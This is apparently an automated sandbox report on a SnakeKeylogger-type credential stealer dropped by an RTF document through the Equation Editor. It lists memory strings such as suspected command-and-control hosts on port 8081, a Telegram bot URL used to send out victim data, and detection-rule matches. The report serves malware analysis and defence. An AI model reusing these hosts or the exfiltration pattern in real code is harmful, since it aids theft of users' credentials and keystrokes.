Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://aborters.duckdns.org:8081
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://anotherarmy.dns.army:8081
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002783000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002783000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027AE000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: http://checkip.dyndns.org/q
Source: cmnjgwhesilo61000.exe, 00000007.00000002.661339983.0000000005B10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.661339983.0000000005B10000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0%
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0-
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0/
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com05
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net03
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ocsp.entrust.net0D
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026FB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://reallyfreegeoip.org
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408443204.0000000002674000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002641000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://varders.kozow.com:8081
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027F9000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002801000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:128757%0D%0ADate%20a
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org
Source: cmnjgwhesilo61000.exe, 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000026E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027DC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002725000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002771000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.000000000278A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027EA000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000027A0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.784
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000036BB000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028D4000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002902000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.00000000028C1000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003707000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659566443.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.comodo.com/CPS0
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/favicon.ico
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=net
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?q=wmf
Source: cmnjgwhesilo61000.exe, 00000007.00000002.659850331.0000000002915000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003811000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000386B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
Source: cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000037FC000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003748000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.00000000037A2000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000381E000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.000000000376A000.00000004.00000800.00020000.00000000.sdmp, cmnjgwhesilo61000.exe, 00000007.00000002.660940596.0000000003856000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/sorry/indextest
Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, COVID19.cs .Net Code: TakeScreenshot
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, COVID19.cs .Net Code: VKCodeToUnicode

System Summary

Source: initial sample Static file information: Filename: na.doc
Source: na.doc, type: SAMPLE Matched rule: Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
Source: 7.2.cmnjgwhesilo61000.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f4afc8.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 5.2.cmnjgwhesilo61000.exe.3f077a8.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
Source: 00000007.00000002.659381111.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000005.00000002.408722887.0000000003E77000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3464, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: cmnjgwhesilo61000.exe PID: 3572, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\pKL9HXcZosWfPt1[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 5_2_002C4924 NtQueryInformationProcess, 5_2_002C4924
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056CF30 7_2_0056CF30
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00561738 7_2_00561738
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00565739 7_2_00565739
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056CF20 7_2_0056CF20
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00561BD0 7_2_00561BD0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005695D0 7_2_005695D0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00565BD0 7_2_00565BD0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005695C0 7_2_005695C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056EBCF 7_2_0056EBCF
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056D3F8 7_2_0056D3F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00560DF8 7_2_00560DF8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00567BF8 7_2_00567BF8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00565BE0 7_2_00565BE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056EBE0 7_2_0056EBE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056D3E8 7_2_0056D3E8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056C590 7_2_0056C590
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056699A 7_2_0056699A
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00562998 7_2_00562998
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00564980 7_2_00564980
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056DD88 7_2_0056DD88
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00563BB8 7_2_00563BB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056ADB8 7_2_0056ADB8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056C5A0 7_2_0056C5A0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00563BAA 7_2_00563BAA
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005669A8 7_2_005669A8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0056ADA8 7_2_0056ADA8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058A120 7_2_0058A120
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058D640 7_2_0058D640
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058A440 7_2_0058A440
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00580040 7_2_00580040
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058C060 7_2_0058C060
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058F260 7_2_0058F260
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00583010 7_2_00583010
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00580017 7_2_00580017
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058D000 7_2_0058D000
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00581828 7_2_00581828
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058BA20 7_2_0058BA20
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058EC20 7_2_0058EC20
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005834D8 7_2_005834D8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058E2C0 7_2_0058E2C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058B0C0 7_2_0058B0C0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_005804F8 7_2_005804F8
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00581CF0 7_2_00581CF0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058CCE0 7_2_0058CCE0
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_00580E98 7_2_00580E98
Source: C:\Users\user\AppData\Roaming\cmnjgwhesilo61000.exe Code function: 7_2_0058DC80 7_2_0058DC80
